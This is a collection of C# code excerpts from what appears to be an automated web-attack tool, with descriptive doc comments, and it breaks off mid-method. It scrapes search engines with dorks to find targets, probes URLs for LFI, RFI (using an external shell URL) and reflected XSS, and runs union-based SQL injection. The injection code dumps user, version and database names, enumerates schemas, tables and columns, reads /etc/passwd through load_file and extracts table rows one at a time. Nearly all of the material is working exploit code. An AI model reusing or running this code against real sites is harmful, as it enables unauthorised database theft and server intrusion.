コード例 #1
        // ?    ===> %3F
        /// <summary>
        /// Issues one Yandex search request per dork and result page and passes each
        /// response body to <c>Extracteur.Yandex</c>.
        /// </summary>
        /// <param name="DorkArray">Search strings; each is URL-encoded into the <c>text</c> query parameter.</param>
        /// <param name="maxpage">
        /// Page limit as text. <c>maxpage + 0</c> is string concatenation, so "5" is parsed as 50;
        /// <c>Convert.ToInt16</c> throws on non-numeric or out-of-range text.
        /// </param>
        public void Yandex(string[] DorkArray, string maxpage)
        {
            int dorkCount = DorkArray.Length;
            int pageLimit = Convert.ToInt16(maxpage + 0);
            HttpRequete client = new HttpRequete();
            Extracteur extractor = new Extracteur();

            // One request to the search front page before the query loop; the response is discarded.
            client.get("https://www.yandex.com/yandsearch");

            int dorkIndex = 0;
            while (dorkIndex < dorkCount)
            {
                for (int pageIndex = 0; pageIndex < pageLimit; pageIndex++)
                {
                    string requestUrl = "http://www.yandex.com/yandsearch?text=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&p=" + pageIndex;
                    string body = client.get(requestUrl);
                    if (body.Contains("search requests sent from your IP"))
                    {
                        // The engine's automated-traffic notice: stop paging this dork.
                        // The progress update is skipped for this iteration.
                        break;
                    }

                    extractor.Yandex(body);
                    form.UpInfos();
                }

                dorkIndex++;
            }
        }
コード例 #2
        /// <summary>
        /// For each <c>delimeteur</c>-separated segment of <paramref name="link"/>, requests the text
        /// before the first '=' followed by <c>=../</c> and checks the response for the string
        /// "No such file or directory".
        /// </summary>
        /// <param name="link">URL whose segments are probed.</param>
        /// <returns>
        /// The outcome for the last segment only, because the flag is overwritten on every iteration;
        /// <c>false</c> if any exception is thrown.
        /// </returns>
        /// <remarks>
        /// The check keys entirely on a verbose file-system error being echoed back. In access logs
        /// the probe appears as a parameter whose whole value is <c>../</c>.
        /// </remarks>
        public bool Lfi(string link)
        {
            HttpRequete client = new HttpRequete();
            bool errorEchoed = false;

            try
            {
                int index = 0;
                while (index <= link.Split(delimeteur).Length - 1)
                {
                    string probe = link.Split(delimeteur)[index].Trim().Split('=')[0] + "=../";

                    // Always true as written: the probe was just given an "=".
                    if (probe.Contains("="))
                    {
                        string body = client.get(probe);
                        errorEchoed = body.Contains("No such file or directory");
                    }

                    index++;
                }

                return errorEchoed;
            }
            catch (Exception)
            {
                // Every failure (network, null input, bad index) is reported as "not found".
                return false;
            }
        }
コード例 #3
        /// <summary>
        /// Substitutes a <c>concat(user(), version(), database())</c> expression for the <c>var_n</c>
        /// placeholder in <c>_url_point</c>, requests the result and, when the outer marker is found
        /// in the response, shows the three values and the resolved host address in the main form.
        /// </summary>
        /// <returns><c>true</c> when the response contains <c>separateur</c>; otherwise <c>false</c>.</returns>
        /// <remarks>
        /// The text shown in the form comes straight from the remote response and is untrusted.
        /// <c>fields[2]</c> is read without a length check.
        /// </remarks>
        public bool setInfos()
        {
            HttpRequete client = new HttpRequete();
            Outils tools = new Outils();
            string probeUrl = _url_point.Replace(
                var_n,
                "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")");
            string body = client.get(probeUrl);

            if (!page_has_marker(body))
            {
                return false;
            }

            string[] fields = ch.extSubResult(s_separateur, ch.extResult(separateur, body));

            // Third '/'-separated piece of the URL, i.e. the authority part of "scheme://host/...".
            string serverIp = tools.avoirip(_url_point.Split('/')[2]);
            setBD(fields[2]);

            // UI controls are updated through Invoke on the control.
            form_principale.groupBox4.Invoke((MethodInvoker)(() =>
            {
                form_principale.txt_user.Text = fields[0];
                form_principale.txt_version.Text = fields[1];
                form_principale.txt_ipserveur.Text = serverIp;
            }));
            return true;

            // Local helper: the response is only parsed when the outer marker is present.
            bool page_has_marker(string text)
            {
                return text.Contains(separateur);
            }
        }
コード例 #4
        /// <summary>
        /// Issues one Google search request per dork and result offset (step 10) and passes each
        /// response body to <c>Extracteur.Google</c>.
        /// </summary>
        /// <param name="DorkArray">Search strings; each is URL-encoded into the <c>q</c> query parameter.</param>
        /// <param name="maxpage">
        /// Offset limit as text. <c>maxpage + 0</c> is string concatenation, so "5" is parsed as 50.
        /// </param>
        /// <remarks>
        /// A response is skipped only when it contains both "CAPTCHA" and <c>form.monip</c>;
        /// the loop keeps sending requests afterwards, it does not stop.
        /// </remarks>
        public void Google(string[] DorkArray, string maxpage)
        {
            int dorkCount = DorkArray.Length;
            int offsetLimit = Convert.ToInt16(maxpage + 0);
            HttpRequete client = new HttpRequete();
            Extracteur extractor = new Extracteur();

            int dorkIndex = 0;
            while (dorkIndex < dorkCount)
            {
                for (int offset = 0; offset < offsetLimit; offset += 10)
                {
                    string requestUrl = "https://www.google.com/search?q=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&start=" + offset;
                    string body = client.get(requestUrl);

                    bool challengePage = body.Contains("CAPTCHA") && body.Contains(form.monip);
                    if (!challengePage)
                    {
                        extractor.Google(body);
                    }

                    form.UpInfos();
                }

                dorkIndex++;
            }
        }
コード例 #5
        /// <summary>
        /// For each <c>delimeteur</c>-separated segment of <paramref name="link"/>, requests the text
        /// before the first '=' followed by <c>=SHELL_URL?</c> and checks the response for the
        /// "RFI_SUCCESSFUL" marker.
        /// </summary>
        /// <param name="link">URL whose segments are probed.</param>
        /// <param name="SHELL_URL">External URL placed in the parameter value.</param>
        /// <returns>
        /// The outcome for the last segment only, because the flag is overwritten on every iteration;
        /// <c>false</c> if any exception is thrown.
        /// </returns>
        /// <remarks>
        /// In access logs the probe appears as a parameter whose value is an external URL ending in '?'.
        /// </remarks>
        private bool Rfi(string link, string SHELL_URL)
        {
            HttpRequete client = new HttpRequete();

            try
            {
                bool markerSeen = false;
                int index = 0;
                while (index <= link.Split(delimeteur).Length - 1)
                {
                    string probe = link.Split(delimeteur)[index].Trim().Split('=')[0] + ("=" + (SHELL_URL + "?"));

                    // Always true as written: the probe was just given an "=".
                    if (probe.Contains("="))
                    {
                        string body = client.get(probe);
                        if (!body.Contains("RFI_SUCCESSFUL"))
                        {
                            markerSeen = false;
                        }
                        else if (body.Contains("$invulnerable"))
                        {
                            markerSeen = false;
                        }
                        else
                        {
                            markerSeen = body.Length > 20;
                        }
                    }

                    index++;
                }

                return markerSeen;
            }
            catch (Exception)
            {
                // Every failure is reported as "not found".
                return false;
            }
        }
コード例 #6
        /// <summary>
        /// Requests <c>_url_point</c> with the <c>var_n</c> placeholder replaced by a
        /// <c>count(0)</c> subquery over <c>information_schema.schemata</c> (excluding
        /// information_schema itself) and parses the marker-delimited part of the response as an integer.
        /// </summary>
        /// <returns>The parsed count.</returns>
        /// <remarks>
        /// <c>Convert.ToInt32</c> is applied directly to text taken from the remote response; there is
        /// no validation here, so callers must expect an exception when that text is not numeric.
        /// The subquery is inserted without <c>ch.Encode</c>, so "information_schema.schemata" appears
        /// as written in the URL passed to <c>hr.get</c>.
        /// </remarks>
        private int getNombreDB()
        {
            HttpRequete client = new HttpRequete();
            string subquery = string.Concat(
                "(select concat(",
                ch.getHex(separateur),
                ",count(0),",
                ch.getHex(separateur),
                ") from information_schema.schemata where not schema_name=",
                ch.getHex("information_schema"),
                ")");
            string requestUrl = _url_point.Replace(var_n, subquery);
            string body = client.get(requestUrl);

            return Convert.ToInt32(ch.extResult(separateur, body));
        }
コード例 #7
        /// <summary>
        /// Requests <c>_url_point</c> with the <c>var_n</c> placeholder replaced by a
        /// <c>count(0)</c> subquery over <c>db_name.tb_name</c> and parses the marker-delimited
        /// part of the response as an integer.
        /// </summary>
        /// <param name="db_name">Schema name, concatenated into the subquery as-is.</param>
        /// <param name="tb_name">Table name, concatenated into the subquery as-is.</param>
        /// <returns>The parsed row count.</returns>
        /// <remarks>
        /// <c>Convert.ToInt32</c> is applied directly to text taken from the remote response; callers
        /// must expect an exception when that text is not numeric.
        /// </remarks>
        private int getNombreDonne(string db_name, string tb_name)
        {
            HttpRequete client = new HttpRequete();
            string subquery = string.Concat(
                "(select concat(",
                ch.getHex(separateur),
                ",count(0),",
                ch.getHex(separateur),
                ") from ",
                db_name,
                ".",
                tb_name,
                ")");
            string requestUrl = _url_point.Replace(var_n, subquery);
            string body = client.get(requestUrl);

            return Convert.ToInt32(ch.extResult(separateur, body));
        }
コード例 #8
        /// <summary>
        /// Requests <c>_url_point</c> with the <c>var_n</c> placeholder replaced by a
        /// <c>count(0)</c> subquery and parses the marker-delimited part of the response as an integer.
        /// </summary>
        /// <param name="db_name">Not used by the body.</param>
        /// <param name="tb_name">Not used by the body.</param>
        /// <returns>The parsed count.</returns>
        /// <remarks>
        /// NOTE(review): despite the name, the subquery counts rows of information_schema.schemata
        /// and ignores both parameters; apart from letter case it is the same text as in
        /// <c>getNombreDB</c>. <c>Convert.ToInt32</c> is applied to remote text without validation.
        /// </remarks>
        private int getNombreColonne(string db_name, string tb_name)
        {
            HttpRequete client = new HttpRequete();
            string subquery = string.Concat(
                "(select concat(",
                ch.getHex(separateur),
                ",count(0),",
                ch.getHex(separateur),
                ") from information_schema.sChEmAtA where not sChEmA_NaMe=",
                ch.getHex("information_schema"),
                ")");
            string requestUrl = _url_point.Replace(var_n, subquery);
            string body = client.get(requestUrl);

            return Convert.ToInt32(ch.extResult(separateur, body));
        }
コード例 #9
        /*
         * //EXCEPTION
         *  http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
         *
         *
         */
        /// <summary>
        /// Runs both checks of <c>sqli_check</c> against <paramref name="url"/> and, if either
        /// reports true, walks the <c>_union</c> templates and the URL parameters until a response
        /// contains one of the marker strings, then hands that response to <c>setResult</c>.
        /// </summary>
        /// <param name="url">URL to analyse; the part before the first '?' becomes <c>_url_base</c>.</param>
        /// <remarks>
        /// Writes the fields <c>_url_originale</c>, <c>_url_base</c>, <c>_param</c>,
        /// <c>_nbr_colonne</c> and <c>_colonne_point</c>. No exception is caught here, so a failing
        /// request propagates to the caller. Status text is written to the form through Invoke.
        /// </remarks>
        public void Analyse(string url)
        {
            form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
            {
                form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine;
            }));
            // Integer arithmetic below (p + 1, u + 1) runs in a checked context.
            checked
            {
                HttpRequete  hr             = new HttpRequete();
                sqli_check   vrf            = new sqli_check();
                sqli_colonne colonne        = new sqli_colonne();
                string       url_inj_point  = string.Empty;
                string       inj_point_curr = string.Empty;
                bool         point_trv      = false;
                _url_originale = url;
                _url_base      = url.Split('?')[0];
                _param         = ch.analyseParam(url);

                // Both checks always run: their results are stored before the || is evaluated.
                bool[] ok = new bool[2];
                ok[0] = vrf.demmareAnalyseFast(url);
                ok[1] = vrf.demmareAnalyseAvanced(url);
                if (ok[0] || ok[1])
                {
                    int u = 0; // index into _union (first template is "Union Style 1")
                    while (!point_trv && u < _union.Count)
                    {
                        _nbr_colonne = colonne.Compter(_param, _url_base, _union[u]);
                        onFait((u + 1).ToString());
                        for (int p = 0; p < _param.Count; p++)
                        {
                            // _colonne_point is read inside the argument of the call that assigns it,
                            // so the URL passed in is built from the value left by the previous pass.
                            _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);

                            // Same URL shape again, now with the freshly assigned _colonne_point.
                            url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);

                            // Any "[t]" still present is replaced by the encoded
                            // concat(user(), version(), database()) expression.
                            inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));

                            string page = hr.get(inj_point_curr);
                            // Either marker in the response counts as a hit.
                            if (page.Contains(separateur) || page.Contains(s_separateur))
                            {
                                setResult(page, url_inj_point);
                                point_trv = true;
                                break;
                            }
                        }
                        u++;
                    }
                }
                else
                {
                    // Neither check reported true: only the status line is updated.
                    form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
                    {
                        form.txt_statut_analyse.Text = "Injection char echouer :( ";
                    }));
                }
            }
        }
コード例 #10
        /// <summary>
        /// For each tree path in <paramref name="chemin_node"/>, clears the child nodes of the
        /// matching database node, requests the table names of that schema through
        /// <c>_url_point</c>, and adds one child node per name returned.
        /// </summary>
        /// <param name="chemin_node">Backslash-separated tree paths; the first component is the schema name.</param>
        /// <remarks>
        /// Table names come from the remote response and are untrusted; each passes through
        /// <c>ch.regexHtmlScape</c> before it is added to the tree. Three empty catch blocks hide
        /// failures, so a missing node or a failed count leaves no trace.
        /// </remarks>
        internal void setTable(string[] chemin_node)
        {
            foreach (string item in chemin_node)
            {
                string[] mrc     = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
                int      indexDB = -1;
                form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                {
                    try
                    {
                        // FirstOrDefault yields null when no node matches; the resulting exception
                        // is swallowed below and indexDB stays -1.
                        indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index;
                        form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Clear();
                    }
                    catch (Exception) { }
                }));

                // nbr is assigned but not read again in this method.
                int nbr = 0;
                try { nbr = getNombreTable(mrc[0]); }
                catch { }
                //(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x6d6f64656c73686f5f6462)
                HttpRequete hr = new HttpRequete();
                // Method 1 (disabled)
                //string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(table_name)," + ch.getHex(separateur) + ") from information_schema.tables where table_schema=" + ch.getHex(db_name) + ")";
                // Method 2 (active): unhex(Hex(cast(group_concat(table_name) as char)))
                string inj       = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(table_name) as char)))," + ch.getHex(separateur) + ") from information_schema.tables where table_schema=" + ch.getHex(mrc[0]) + ")";
                string url_f     = _url_point.Replace(var_n, (inj));
                string page      = hr.get(url_f);
                string tablebrut = ch.extResult(separateur, page);

                // The marker-delimited text is treated as a comma-separated list of names.
                string[] tables = tablebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
                foreach (string table in tables)
                {
                    if (!string.IsNullOrEmpty(table))
                    {
                        string table_name = ch.regexHtmlScape(table);
                        try
                        {
                            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.tree_schema_dmp.BeginUpdate();
                                // With indexDB still -1 this indexer throws; the empty catch below hides it
                                // (presumably also leaving BeginUpdate without its EndUpdate — confirm).
                                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Add(table_name);
                                form_principale.tree_schema_dmp.Nodes[indexDB].Expand();
                                form_principale.tree_schema_dmp.EndUpdate();
                            }));
                        }
                        catch { }
                    }
                }
            }
        }
コード例 #11
        /// <summary>
        /// Requests <paramref name="url_point"/> with the <c>var_n</c> placeholder replaced by a
        /// <c>concat(user(), version(), database())</c> expression and returns the values split out
        /// of the marker-delimited part of the response.
        /// </summary>
        /// <param name="url_point">URL template containing the <c>var_n</c> placeholder.</param>
        /// <returns>
        /// The array produced by <c>ch.extSubResult</c> when the response contains <c>separateur</c>;
        /// otherwise four empty strings.
        /// </returns>
        /// <remarks>The returned text originates from the remote response and is untrusted.</remarks>
        internal string[] getInfos(string url_point)
        {
            HttpRequete client = new HttpRequete();
            string probeUrl = url_point.Replace(
                var_n,
                "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")");
            string body = client.get(probeUrl);

            if (!body.Contains(separateur))
            {
                // No marker in the response: hand back placeholders instead of null.
                string[] empty = { "", "", "", "" };
                return empty;
            }

            string[] fields = ch.extSubResult(s_separateur, ch.extResult(separateur, body));
            return fields;
        }
コード例 #12
        /// <summary>
        /// For each tree path with at least a schema and a table component, clears the child nodes
        /// of the matching table node, requests the column names of that table through
        /// <c>_url_point</c>, and adds one child node per name returned.
        /// </summary>
        /// <param name="chemin_node">Backslash-separated tree paths: schema, then table.</param>
        /// <remarks>
        /// Column names come from the remote response and are untrusted; each passes through
        /// <c>ch.regexHtmlScape</c> before it is added to the tree. The node lookups are not wrapped
        /// in try/catch, so a path that matches no node raises from inside Invoke.
        /// </remarks>
        internal void setColonne(String[] chemin_node)
        {
            foreach (string item in chemin_node)
            {
                string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
                // Paths with fewer than two components are skipped silently.
                if (mrc.Length > 1)
                {
                    int indexDB    = -1;
                    int indexTable = -1;
                    form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                    {
                        // FirstOrDefault yields null when no node matches; reading .Index then throws.
                        indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index;
                        indexTable = form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[1])).Index;
                        form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Clear();
                    }));


                    // nbr is assigned but not read again in this method; failures are swallowed.
                    int nbr = 0;
                    try { nbr = getNombreColonne(mrc[0], mrc[1]); }
                    catch { }
                    HttpRequete hr = new HttpRequete();
                    // Method 0 (disabled)
                    //string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(column_name)," + ch.getHex(separateur) + ") from information_schema.columns where table_schema=" + ch.getHex(db_name) + " and table_name=" + ch.getHex(table_name) + ")";
                    // Method 1 (active): unhex(Hex(cast(group_concat(column_name) as char)))
                    string inj         = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(column_name) as char)))," + ch.getHex(separateur) + ") from information_schema.columns where table_schema=" + ch.getHex(mrc[0]) + " and table_name=" + ch.getHex(mrc[1]) + ")";
                    // The subquery goes through ch.Encode before substitution, so its on-the-wire
                    // form depends on that helper (not visible here).
                    string url_f       = _url_point.Replace(var_n, ch.Encode(inj));
                    string page        = hr.get(url_f);
                    string colonnebrut = ch.extResult(separateur, page);

                    // The marker-delimited text is treated as a comma-separated list of names.
                    string[] colonnes = colonnebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
                    foreach (string colonne in colonnes)
                    {
                        if (!string.IsNullOrEmpty(colonne))
                        {
                            string colonne_name = ch.regexHtmlScape(colonne);
                            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Add(colonne_name);
                                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Expand();
                            }));
                        }
                    }
                }
            }
        }
コード例 #13
        /// <summary>
        /// Issues one Bing search request per dork and result offset (step 15) and passes each
        /// response body to <c>Extracteur.Bing</c>.
        /// </summary>
        /// <param name="DorkArray">Search strings; each is URL-encoded into the <c>q</c> query parameter.</param>
        /// <param name="maxpage">
        /// Offset limit as text. <c>maxpage + 0</c> is string concatenation, so "5" is parsed as 50.
        /// </param>
        /// <remarks>
        /// Unlike the Yandex and Google variants, the response is not checked for a rate-limit or
        /// challenge page before extraction. Requests use plain http.
        /// </remarks>
        public void Bing(string[] DorkArray, string maxpage)
        {
            int dorkCount = DorkArray.Length;
            int offsetLimit = Convert.ToInt16(maxpage + 0);
            HttpRequete client = new HttpRequete();
            Extracteur extractor = new Extracteur();

            int dorkIndex = 0;
            while (dorkIndex < dorkCount)
            {
                for (int offset = 0; offset < offsetLimit; offset += 15)
                {
                    string requestUrl = "http://bing.com/search?q=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&first=" + offset;
                    string body = client.get(requestUrl);
                    extractor.Bing(body);
                    form.UpInfos();
                }

                dorkIndex++;
            }
        }
コード例 #14
        /// <summary>
        /// Issues one Yahoo search request per dork and result offset (starting at 1, step 10) and
        /// passes each response body to <c>Extracteur.Yahoo</c>.
        /// </summary>
        /// <param name="DorkArray">Search strings; each is URL-encoded into the <c>p</c> query parameter.</param>
        /// <param name="maxpage">
        /// Offset limit as text. <c>maxpage + 0</c> is string concatenation, so "5" is parsed as 50.
        /// </param>
        /// <remarks>
        /// The response is not checked for a rate-limit or challenge page before extraction.
        /// Requests use plain http.
        /// </remarks>
        public void Yahoo(string[] DorkArray, string maxpage)
        {
            int dorkCount = DorkArray.Length;
            int offsetLimit = Convert.ToInt16(maxpage + 0);
            HttpRequete client = new HttpRequete();
            Extracteur extractor = new Extracteur();

            int dorkIndex = 0;
            while (dorkIndex < dorkCount)
            {
                for (int offset = 1; offset < offsetLimit; offset += 10)
                {
                    string requestUrl = "http://search.yahoo.com/search?n=100&p=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&pstart=1&b=" + offset;
                    string body = client.get(requestUrl);
                    extractor.Yahoo(body);
                    form.UpInfos();
                }

                dorkIndex++;
            }
        }
コード例 #15
        /// <summary>
        /// Requests the list of schema names (other than information_schema) through
        /// <c>_url_point</c> and adds them as top-level nodes of the schema tree.
        /// </summary>
        /// <remarks>
        /// Node text comes from the remote response and is untrusted. In the multi-schema branch
        /// each name passes through <c>ch.regexHtmlScape</c>; in the single-node branch the raw
        /// extracted text is used without that call.
        /// </remarks>
        internal void setAllBD()
        {
            HttpRequete hr  = new HttpRequete();
            int         nbr = 0;

            // A failed count is swallowed and leaves nbr at 0, which selects the single-node branch below.
            try { nbr = getNombreDB(); }
            catch { }//(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/sChEmA_NaMe),0x217e21) /**/fRoM information_schema./**/sChEmAtA /**/wHeRe not /**/sChEmA_NaMe=0x696e666f726d6174696f6e5f736368656d61)
            string inj    = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(schema_name)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")";
            // The subquery goes through ch.Encode before it replaces the var_n placeholder.
            string url_f  = _url_point.Replace(var_n, ch.Encode(inj));
            string page   = hr.get(url_f);
            string dbbrut = ch.extResult(separateur, page);

            if (dbbrut != string.Empty)
            {
                if (nbr > 1)
                {
                    // More than one schema counted: treat the text as a comma-separated list.
                    string[] basededonnes = dbbrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
                    foreach (string bd in basededonnes)
                    {
                        if (!string.IsNullOrEmpty(bd))
                        {
                            string   bd_name = ch.regexHtmlScape(bd);
                            TreeNode treeBD  = new TreeNode(bd_name);
                            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.tree_schema_dmp.BeginUpdate();
                                form_principale.tree_schema_dmp.Nodes.Add(treeBD);
                                form_principale.tree_schema_dmp.EndUpdate();
                            }));
                        }
                    }
                }
                else
                {
                    // Count of 0 or 1: the whole extracted text becomes one node, unsplit and
                    // without the regexHtmlScape pass used above.
                    TreeNode treeBD = new TreeNode(dbbrut);
                    form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                    {
                        form_principale.tree_schema_dmp.Nodes.Add(treeBD);
                    }));
                }
            }
        }
コード例 #16
 /// <summary>
 /// Requests <paramref name="url"/> once per parameter with the <c>sqli</c> string inserted
 /// after that parameter and returns as soon as <c>verifPage</c> accepts a response.
 /// </summary>
 /// <param name="url">URL to test; the part before the first '?' is used as the base.</param>
 /// <returns><c>true</c> on the first response accepted by <c>verifPage</c>; otherwise <c>false</c>.</returns>
 /// <remarks>Overwrites the <c>_param</c> field. Exceptions from the request are not caught.</remarks>
 public bool demmareAnalyseFast(string url)
 {
     checked
     {
         string baseUrl = url.Split('?')[0];
         HttpRequete client = new HttpRequete();
         chaine helper = new chaine();
         _param = helper.analyseParam(url);

         int index = 0;
         while (index < _param.Count)
         {
             // Parameters up to and including the current one, the test string, then the rest.
             string candidate = baseUrl + helper.genParamParIndex(_param, 0, index + 1) + sqli + helper.genParamParIndex(_param, index + 1, _param.Count);
             string body = client.get(candidate);
             if (verifPage(body))
             {
                 return true;
             }

             index++;
         }

         return false;
     }
 }
コード例 #17
        /// <summary>
        /// For each <c>delimeteur</c>-separated segment of <paramref name="url"/>, requests a string
        /// ending in a fixed script-tag marker and checks whether the response echoes that marker
        /// verbatim without a SQL syntax error message.
        /// </summary>
        /// <param name="url">URL whose segments are probed.</param>
        /// <returns>The outcome for the last segment only; the flag is overwritten on every iteration.</returns>
        /// <remarks>
        /// The check looks for the marker unencoded, so output encoding of reflected values makes it
        /// report <c>false</c>. There is no try/catch: request and indexing failures propagate.
        /// NOTE(review): the '='-split is indexed with the loop counter, not with 0.
        /// </remarks>
        public bool Xss(string url)
        {
            HttpRequete client = new HttpRequete();
            bool reflected = false;

            int i = 0;
            while (i <= url.Split(delimeteur).Length - 1)
            {
                string target = url.Split(delimeteur)[i].Trim().Split('=')[i] + ('=' + ('"' + "><script>alert(\'XSS_SUCCESSFUL\')</script>"));
                string page = client.get(target);

                if (!page.Contains("<script>alert(\'XSS_SUCCESSFUL\')</script>"))
                {
                    reflected = false;
                }
                else
                {
                    reflected = !page.Contains("You have an error in your SQL syntax");
                }

                i++;
            }

            return reflected;
        }
コード例 #18
        /// <summary>
        /// Issues one AOL search request per dork and page number and passes each response body to
        /// <c>Extracteur.Aol</c>.
        /// </summary>
        /// <param name="DorkArray">Search strings, placed into the <c>q</c> query parameter.</param>
        /// <param name="maxpage">
        /// Page limit as text. <c>maxpage + 0</c> is string concatenation, so "5" is parsed as 50.
        /// </param>
        /// <remarks>
        /// NOTE(review): the dork is concatenated into the URL without <c>HttpUtility.UrlEncode</c>,
        /// unlike the other engine methods, so characters such as '&amp;' or '#' in a dork change the
        /// request's structure. The response is not checked for a rate-limit page.
        /// </remarks>
        internal void Aol(string[] DorkArray, string maxpage)
        {
            int dorkCount = DorkArray.Length;
            int pageLimit = Convert.ToInt16(maxpage + 0);
            HttpRequete client = new HttpRequete();
            Extracteur extractor = new Extracteur();

            // One request to the search home page before the query loop; the response is discarded.
            client.get("http://search.aol.com/aol/webhome");

            int dorkIndex = 0;
            while (dorkIndex < dorkCount)
            {
                for (int pageIndex = 0; pageIndex < pageLimit; pageIndex++)
                {
                    string requestUrl = "http://search.aol.com/aol/search?q=" + DorkArray[dorkIndex] + "&page=" + pageIndex;
                    string body = client.get(requestUrl);
                    extractor.Aol(body);
                    form.UpInfos();
                }

                dorkIndex++;
            }
        }
コード例 #19
        /// <summary>
        /// Requests <paramref name="url_point"/> with the <c>var_n</c> placeholder replaced by an
        /// expression that wraps <c>load_file</c> of <paramref name="fichier"/> between markers, and
        /// reports whether any text came back between those markers.
        /// </summary>
        /// <param name="url_point">URL template containing the <c>var_n</c> placeholder.</param>
        /// <param name="fichier">Server-side path to test; defaults to <c>/etc/passwd</c>.</param>
        /// <returns><c>true</c> when the marker is present and the extracted text is non-empty.</returns>
        /// <remarks>
        /// A <c>true</c> result means the database account behind the endpoint can read server files.
        /// In request logs the probe is recognisable by a mixed-case <c>lOaD_FiLe(</c> call with
        /// <c>/**/</c> comment padding.
        /// </remarks>
        internal bool checkLoadFile(string url_point, string fichier = "/etc/passwd")
        {
            HttpRequete client = new HttpRequete();
            Outils tools = new Outils(); // constructed as in the original; not used afterwards
            string probeUrl = url_point.Replace(
                var_n,
                "cOnVeRt(/**/cOnCaT(" + ch.getHex(separateur) + "/**/hEx(/**/lOaD_FiLe(" + ch.getHex(fichier) + "))," + ch.getHex(separateur) + ") using utf8)");
            string body = client.get(probeUrl);

            if (!body.Contains(separateur))
            {
                return false;
            }

            string extracted = ch.extResult(separateur, body);
            return extracted != "";
        }
コード例 #20
        /// <summary>
        /// For each tree path with schema, table and column-list components, adds the columns to
        /// the dump grid and then requests the table one row at a time through <c>_url_point</c>,
        /// appending each extracted row to the grid.
        /// </summary>
        /// <param name="chemin_node">
        /// Backslash-separated tree paths: schema, table, then column names joined by "[-COL]".
        /// </param>
        /// <remarks>
        /// One HTTP request is sent per row (<c>limit d,1</c>), so a large table produces a long run
        /// of near-identical requests that differ only in the offset. Cell values come from the
        /// remote response and are untrusted. Nothing here catches exceptions.
        /// </remarks>
        internal void setDonne(String[] chemin_node)
        {
            foreach (string item in chemin_node)
            {
                string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
                // Paths without a column component are skipped silently.
                if (mrc.Length > 2)
                {
                    int nbr_row = 0;
                    // Not wrapped in try/catch: a non-numeric count response aborts the whole call.
                    nbr_row = getNombreDonne(mrc[0], mrc[1]);
                    HttpRequete hr      = new HttpRequete();
                    string[]    colonne = mrc[2].Split(new string[] { "[-COL]" }, StringSplitOptions.RemoveEmptyEntries);
                    form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() =>
                    {
                        foreach (string element in colonne)
                        {
                            if (element != string.Empty)
                            {
                                // The column name doubles as the header text.
                                form_principale.dataGridView_dumper.Columns.Add(element, element);
                            }
                        }
                    }));
                    for (int d = 0; d < nbr_row; d++)
                    {
                        // Schema and table names are concatenated as-is; the row offset is the loop index.
